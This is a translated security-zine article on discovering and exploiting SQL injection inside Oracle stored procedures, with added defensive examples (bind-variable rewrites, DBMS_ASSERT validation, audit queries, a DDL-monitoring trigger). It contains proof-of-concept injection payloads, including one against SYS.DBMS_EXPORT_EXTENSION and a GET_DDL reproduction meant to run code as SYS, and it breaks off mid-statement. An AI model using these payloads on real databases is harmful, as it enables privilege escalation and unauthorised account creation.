In-depth Mining of SQL Injection in Oracle


= Ph4nt0m Security Team =

Issue 0x02, Phile #0x06 of 0x0A


|=---------------------------------------------------------------------------=|
|=-----------------=[ Digging into SQL Injection in Oracle ]=-----------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=-----------------------------=[ By kj021320 ]=-----------------------------=|
|=-------------------------=[ <Kj021320_at_126.com> ]=-----------------------=|
|=---------------------------------------------------------------------------=|

I. Preface

I haven't written a paper for a long time; I have been lazy. I think Oracle attack and defense technology is rarely
studied in China and is relatively lacking, though maybe that is just my ignorance. Abroad, many papers have already
become classics of Oracle attack technology. Next I will discuss Oracle-internal SQL injection technology with you.
I believe everyone has read my "Art of WEB-SQL-INJECTION 2nd volume ORACLE" from the beginning of 2007; that article
already covered detecting function injection in Oracle. Unfortunately, many of my papers went to the grave in a data
loss. The present title is "Dig into SQLINJECTION in ORACLE". Why? Because Oracle-internal SQL injection is not only a
matter of functions and stored procedures; if you think so, your view is too narrow. In fact, SQL injection can still
appear in many other places, for example triggers, SQLJ, jobs, and so on. I hope this article will help you with
Oracle attack and defense; consider it a brick thrown out to attract jade.

II. Main Text

On the web, SQL injection has become the mainstream way of compromising websites; that is no exaggeration. So inside
the database, what kind of stored procedures and functions produce SQL injection? First, let's look at an example:

Example 1:

CREATE OR REPLACE PROCEDURE kjtest (injcode IN VARCHAR2)
AS
BEGIN
  -- The parameter is concatenated into the text of a dynamic PL/SQL block
  EXECUTE IMMEDIATE 'begin insert into KJTESTTABLE values (''' || injcode || '''); end;';
END;
/

Looking at the stored procedure above, it simply writes its parameter into a table; this kind of code often appears in development.

The following call writes the string 1 into the KJTESTTABLE table:

DECLARE
BEGIN
  KJTEST('1');
END;
/

Now we can run a POC against injcode:

DECLARE
BEGIN
  -- Closes the literal inside the dynamic block and appends a second statement
  KJTEST('1''); dbms_output.put_line(''hello');
END;
/

Executing this, you can see the output hello in the console.

OK, the EXP for this attack is very easy to write!

DECLARE
BEGIN
  KJTEST('1''); EXP-CODE; dbms_output.put_line(''hello');
END;
/

This is how SQL injection occurs in such a stored procedure. Usually a stored procedure written by an ordinary user that
has such a vulnerability is of limited use: you can only get at that user's own data. However, if an administrative account
such as SYS or SYSTEM owns a stored procedure with this problem, it is a big deal. Now let's look at the privilege model
for procedure calls in Oracle.

As shown below, a normal user KJ calls sys.dbms_metadata.get_ddl to obtain a system object. When the function is called,
the caller is switched to the privileges of the function's owner, SYS (definer's rights). The function queries the system
object with those privileges, returns the result to KJ, and the session switches back to KJ's own privileges.
See the following illustration:

User ---> call a function (convert to the function owner's permission) ---> execute an operation ---> obtain the result ---> (convert to your own permission) ---> end

Continuing from the above: if SQL injection occurs in an object owned by SYS, then our injected statements run as SYS,
which includes the ability to add a user. So in the EXP-CODE of the example above we can, as SYS, run
execute immediate 'create user kj identified by kj'. OK, that is all we will say about the first example here.

Not all Oracle-internal SQL injection can be used like this! The situation in the example above is actually rare in
practice, so make good use of it when you find it! Let's look at the following example.

Example 2:

CREATE OR REPLACE PROCEDURE kjtest (injcode IN VARCHAR2)
AS
  tbn VARCHAR2(1000);
BEGIN
  -- A single dynamic SELECT; the parameter is still concatenated into the statement text
  EXECUTE IMMEDIATE 'select table_name from user_tables where table_name = ''' || injcode || ''''
    INTO tbn;
  DBMS_OUTPUT.PUT_LINE(tbn);
END;
/

A normal call of this procedure:

DECLARE
BEGIN
  KJTEST('KJTESTTABLE');
END;
/

It looks up the entry named KJTESTTABLE in your user's table catalog and prints it.

OK, now pay attention to how the stored procedure executes its dynamic SQL. Because the target runs a single SQL
statement, we cannot use multiple statements for the attack as in Example 1, but we can still control what happens while
the current statement executes. The method is to create a function that carries the EXP and make this SQL statement
call it. See the following usage:

CREATE OR REPLACE FUNCTION kjhackerexp RETURN INTEGER AUTHID CURRENT_USER IS
  result INTEGER;
  -- An autonomous transaction lets the function perform DML (and COMMIT) while being called from a SELECT
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'insert into kjtesttable values (''021320'')';
  COMMIT;
  RETURN(result);
END kjhackerexp;
/

DECLARE
BEGIN
  -- The dynamic statement becomes: ... where table_name = 'KJTESTTABLE'||KJHACKEREXP()||''
  KJTEST('KJTESTTABLE''||KJHACKEREXP()||''');
END;
/
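The defender's counterpart to the two examples above, as an added example that is not part of the original paper: the same two procedures rewritten so that the parameter is bound rather than concatenated, plus a variant for the case where the value has to become an object name and a bind variable cannot be used. The procedure names kjtest_safe, kjtest_lookup_safe and kjtest_count_rows and the test calls are assumptions made here.

```sql
-- Example 1 hardened: injcode is a bind variable of the dynamic block, so the text
-- '); dbms_output.put_line('hello  is stored as data and never parsed as PL/SQL.
CREATE OR REPLACE PROCEDURE kjtest_safe (injcode IN VARCHAR2)
  AUTHID CURRENT_USER   -- invoker's rights: the body runs with the caller's privileges, not the owner's
AS
BEGIN
  EXECUTE IMMEDIATE 'begin insert into kjtesttable values (:v); end;' USING injcode;
  -- With no real need for dynamic SQL, plain static SQL is better still:
  -- INSERT INTO kjtesttable VALUES (injcode);
END;
/

-- Example 2 hardened: a bind in the single-statement query. The value
-- KJTESTTABLE'||KJHACKEREXP()||' is now compared literally against TABLE_NAME;
-- KJHACKEREXP is never called because a bind value is never parsed.
CREATE OR REPLACE PROCEDURE kjtest_lookup_safe (injcode IN VARCHAR2)
  AUTHID CURRENT_USER
AS
  tbn VARCHAR2(128);
BEGIN
  EXECUTE IMMEDIATE 'select table_name from user_tables where table_name = :t'
    INTO tbn USING injcode;
  DBMS_OUTPUT.PUT_LINE(tbn);
EXCEPTION
  WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('no such table');
END;
/

-- When the value must become an identifier (an object name in the FROM clause) it cannot
-- be bound; validate it with DBMS_ASSERT, which raises ORA-44003 for anything that is not
-- a simple SQL name, so no quote, space, semicolon or comment marker can get through.
CREATE OR REPLACE PROCEDURE kjtest_count_rows (tab IN VARCHAR2)
  AUTHID CURRENT_USER
AS
  n PLS_INTEGER;
BEGIN
  EXECUTE IMMEDIATE 'select count(*) from ' || DBMS_ASSERT.SIMPLE_SQL_NAME(tab) INTO n;
  DBMS_OUTPUT.PUT_LINE(tab || ': ' || n || ' rows');
END;
/

-- Constructed test calls: the paper's two payloads against the hardened procedures.
SET SERVEROUTPUT ON
BEGIN
  kjtest_safe('1''); dbms_output.put_line(''hello');          -- one row inserted, nothing printed
  kjtest_lookup_safe('KJTESTTABLE''||KJHACKEREXP()||''');     -- prints: no such table
  kjtest_count_rows('KJTESTTABLE');                           -- prints the row count
END;
/
BEGIN
  kjtest_count_rows('KJTESTTABLE where 1=1; --');             -- raises ORA-44003: invalid SQL name
END;
/
```

The AUTHID CURRENT_USER clause is the second half of the fix: even if a bug remains, the body executes with the caller's privileges rather than the owner's, which removes the privilege switch described in the call-permission model above.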

OK. This is how SQL injection arises inside Oracle; the warm-up is complete! Now on to the mining section.

Mining is divided into two parts: black box and white box.

First the white-box mode. The source of every object in Oracle is stored in the database, so we can retrieve it with
the stored procedure SYS.DBMS_METADATA.GET_DDL, using a statement similar to the following:

SELECT sys.DBMS_METADATA.GET_DDL('FUNCTION', 'KJHACKEREXP')
FROM DUAL;

This returns the DDL source of the object; you can also query the source text yourself:

SELECT * FROM all_source;
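As an added example, not the paper's own query: the white-box check above turned into a data-dictionary query that lists definer's-rights program units in privileged schemas whose source executes dynamic SQL, and a second query that flags wrapped bodies, which cannot be read and therefore need the black-box methods described later. The list of privileged schemas is an assumption; adjust it to the accounts that hold DBA-level privileges in your instance.

```sql
-- Lines of definer's-rights program units that execute dynamic SQL.
-- DBA_PROCEDURES.AUTHID says whose privileges a body runs with; DBA_SOURCE holds the text.
SELECT p.owner, p.object_name, s.type, p.authid, s.line, TRIM(s.text) AS text
FROM   dba_procedures p
JOIN   dba_source s
       ON s.owner = p.owner AND s.name = p.object_name
WHERE  p.procedure_name IS NULL                 -- object-level row, not one per sub-program
AND    p.authid = 'DEFINER'
AND    p.owner IN ('SYS', 'SYSTEM', 'CTXSYS', 'MDSYS', 'XDB')   -- assumed list of privileged schemas
AND    s.type IN ('PROCEDURE', 'FUNCTION', 'PACKAGE BODY', 'TYPE BODY')
AND   (UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'
    OR UPPER(s.text) LIKE '%DBMS_SQL.PARSE%')
ORDER BY p.owner, p.object_name, s.type, s.line;

-- Program units whose source is wrapped: line 1 of the stored text carries the
-- "wrapped" keyword and the rest is unreadable, so these cannot be reviewed this way.
SELECT DISTINCT owner, name, type
FROM   dba_source
WHERE  line = 1
AND    UPPER(text) LIKE '%WRAPPED%'
ORDER BY owner, name, type;
```

Each hit from the first query is a place to read on from: the question is whether the text passed to EXECUTE IMMEDIATE (or DBMS_SQL.PARSE) is built by concatenating a parameter, as in both examples above, or whether parameters arrive through USING / bind variables.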

But is it that simple? Of course not. Oracle also provides encryption for stored procedures and functions, similar to
SQL Server's stored-procedure encryption. So when you view CTXSYS.CTX_DDL you will find the following:

create or replace package body ctxsys.CTX_DDL wrapped

Yes, this is Oracle's wrap encryption, so such objects can only be tested black-box. How do we find out which operations
the Oracle object performs? The following methods are available:

1. Oracle network trace files or server trace files.
2. Analyzing the Oracle redo logs.
3. Trigger-based monitoring.
4. Querying the Oracle SQL cache (the SGA).

And if you have the ability to decompile (unwrap) Oracle stored procedures, so much the better.
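Method 3 of the list above, trigger-based monitoring, worked through as an added example that is not from the paper: a database-level DDL trigger that records every CREATE/ALTER/DROP of a user or role and every GRANT, together with the statement text, the login user and the schema in effect. The table and trigger names are assumptions, and creating the trigger requires the ADMINISTER DATABASE TRIGGER privilege.

```sql
-- Audit trail table (constructed for this example)
CREATE TABLE ddl_watch (
  ts         TIMESTAMP     DEFAULT SYSTIMESTAMP,
  login_user VARCHAR2(128),   -- the account that logged in (SESSION_USER)
  cur_schema VARCHAR2(128),   -- schema in effect when the DDL ran
  os_user    VARCHAR2(128),
  event      VARCHAR2(30),
  obj_type   VARCHAR2(30),
  obj_name   VARCHAR2(128),
  sql_text   VARCHAR2(4000)
);

CREATE OR REPLACE TRIGGER ddl_watch_trg
AFTER CREATE OR ALTER OR DROP OR GRANT ON DATABASE
DECLARE
  PRAGMA AUTONOMOUS_TRANSACTION;   -- the insert must commit independently of the DDL
  v_pieces ora_name_list_t;        -- ORA_SQL_TXT returns the statement in 64-byte pieces
  v_n      PLS_INTEGER;
  v_text   VARCHAR2(32767);
BEGIN
  -- Only user/role and privilege DDL is of interest here; widen the filter as needed
  IF ora_dict_obj_type IN ('USER', 'ROLE') OR ora_sysevent = 'GRANT' THEN
    v_n := ora_sql_txt(v_pieces);
    FOR i IN 1 .. v_n LOOP
      v_text := v_text || v_pieces(i);
    END LOOP;
    INSERT INTO ddl_watch (login_user, cur_schema, os_user, event, obj_type, obj_name, sql_text)
    VALUES (ora_login_user,
            SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA'),
            SYS_CONTEXT('USERENV', 'OS_USER'),
            ora_sysevent, ora_dict_obj_type, ora_dict_obj_name,
            SUBSTR(v_text, 1, 4000));
    COMMIT;
  END IF;
END;
/

-- Review query: user/privilege DDL issued by accounts that should not be doing it
SELECT ts, login_user, cur_schema, os_user, event, obj_type, obj_name, sql_text
FROM   ddl_watch
WHERE  login_user NOT IN ('SYS', 'SYSTEM')   -- assumed list of expected administrators
ORDER BY ts DESC;
```

The useful signal is the pair login_user / cur_schema: a CREATE USER injected through a SYS-owned definer's-rights procedure, as in the first example, executes with CURRENT_SCHEMA = SYS but is recorded with the real login user, which is exactly the combination a legitimate administrator never produces.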

The following shows the simplest approach, querying the SGA. First execute this classic EXP and then fetch it back:

SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO', 'BAR',
       'DBMS_OUTPUT".PUT(:P1); SYS.DBMS_OUTPUT.PUT_LINE(''KJ021320''); END; --',
       'SYS', 0, '1')
FROM DUAL;

Then run the following query to view the SGA:

SELECT a.ADDRESS, s.HASH_VALUE, s.PIECE, s.SQL_TEXT,
       u.USERNAME PARSING_USER_ID, c.USERNAME PARSING_SCHEMA_ID
FROM   v$sqlarea a, v$sqltext_with_newlines s, dba_users u, dba_users c
WHERE  a.ADDRESS = s.ADDRESS
AND    a.HASH_VALUE = s.HASH_VALUE
AND    a.PARSING_USER_ID = u.USER_ID
AND    a.PARSING_SCHEMA_ID = c.USER_ID
AND    EXISTS (SELECT 'x' FROM v$sqltext_with_newlines x
               WHERE x.ADDRESS = a.ADDRESS
               AND   x.HASH_VALUE = a.HASH_VALUE
               AND   UPPER(x.SQL_TEXT) LIKE '%SYS.DBMS_OUTPUT.PUT_LINE(%')
ORDER BY 1, 2, 3;

The following result is displayed:

ADDRESS  HASH_VALUE PIECE SQL_TEXT                                                            PARSING_USER_ID PARSING_SCHEMA_ID
668C9120 1612804047 0     BEGIN "SYS"."DBMS_OUTPUT".PUT(:P1); SYS.DBMS_OUTPUT.PUT_LINE('KJ0  SYS
668C9120 1612804047 1     21320'); END; --".ODCIIndexUtilCleanup(:p1); END;                    SYS

Joining the two pieces gives the statement that was actually executed:

BEGIN "SYS"."DBMS_OUTPUT".PUT(:P1); SYS.DBMS_OUTPUT.PUT_LINE('KJ021320'); END; --".ODCIIndexUtilCleanup(:p1); END;

Because this is a multi-statement injection point, the attack method of Example 1 applies.

Next, let's continue with how to use Oracle tracing to record the data. There are several ways to obtain the trace file
that the server writes in the background while a SQL statement executes: one is SQL_TRACE, another is DBMS_SUPPORT or
DBMS_SYSTEM, and you can also use event 10046 directly. The procedure is as follows:

ALTER SESSION SET EVENTS '10046 trace name context forever, level 12';
-- your SQL statement...
ALTER SESSION SET EVENTS '10046 trace name context off';

The level has several options: 1 is equivalent to setting SQL_TRACE = TRUE; 4 includes the result of 1 plus the actual
values of bind variables; 8 includes the result of 1 plus wait events; 12 includes all of these (bind values and wait
events) at the same time. So level 12 is the most detailed trace.
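An added example, not from the paper, of running the 10046 trace from SQL*Plus so that the resulting file is easy to find afterwards: TRACEFILE_IDENTIFIER tags the file name, and V$DIAG_INFO (11g and later) reports the full path. The DBMS_MONITOR calls are the supported alternative to the event syntax and produce the same content; the statement under test is a placeholder assumed here.

```sql
-- Tag the trace file name so it can be told apart from the others in the trace directory
ALTER SESSION SET tracefile_identifier = 'inj_test';

-- Event syntax as in the article (level 12 = SQL text + bind values + wait events)
ALTER SESSION SET EVENTS '10046 trace name context forever, level 12';
-- Supported packaged equivalent for the current session (same content as level 12):
-- EXEC DBMS_MONITOR.SESSION_TRACE_ENABLE(session_id => NULL, serial_num => NULL, waits => TRUE, binds => TRUE)

-- Statement under test goes here. Every statement the server parses on its behalf,
-- including dynamic SQL built inside a (wrapped) definer's-rights procedure, is written out.
SELECT COUNT(*) FROM kjtesttable;

ALTER SESSION SET EVENTS '10046 trace name context off';
-- EXEC DBMS_MONITOR.SESSION_TRACE_DISABLE

-- Where did the file go? (11g and later; on 10g look under the user_dump_dest parameter)
SELECT value AS trace_file FROM v$diag_info WHERE name = 'Default Trace File';
```

In the file, each parsed statement follows a PARSING IN CURSOR line and, at level 4 or 12, its bind values follow a BINDS line; tkprof summarises the file if it is long. The recursive statements emitted by the procedure under test are the part that shows whether the caller's parameter ended up inside the statement text.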

OK. I will now use a previous vulnerability for testing:

Http://www.milw0rm.com/exploits/3363

This is the SQL injection vulnerability in SYS.DBMS_METADATA.GET_DDL. Let's see how I reproduce it in PL/SQL.
The warm-up for its injection point:

CREATE OR REPLACE FUNCTION kjhackerexp RETURN INTEGER AUTHID CURRENT_USER IS
  result INTEGER;
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'insert into kj0213109kjtesttable VALUES (...)';  -- the value list is missing from the original text
  COMMIT;
  RETURN(result);
END kjhackerexp;
/

The key statements are as follows:

ALTER SESSION SET EVENTS '10046 trace name context forever, level 12';

SELECT sys.DBMS_METADATA.GET_DDL('''||kj0213109kjhackerexp()||''', '') FROM dual;

Alter session set events 10046 TRACE NAME
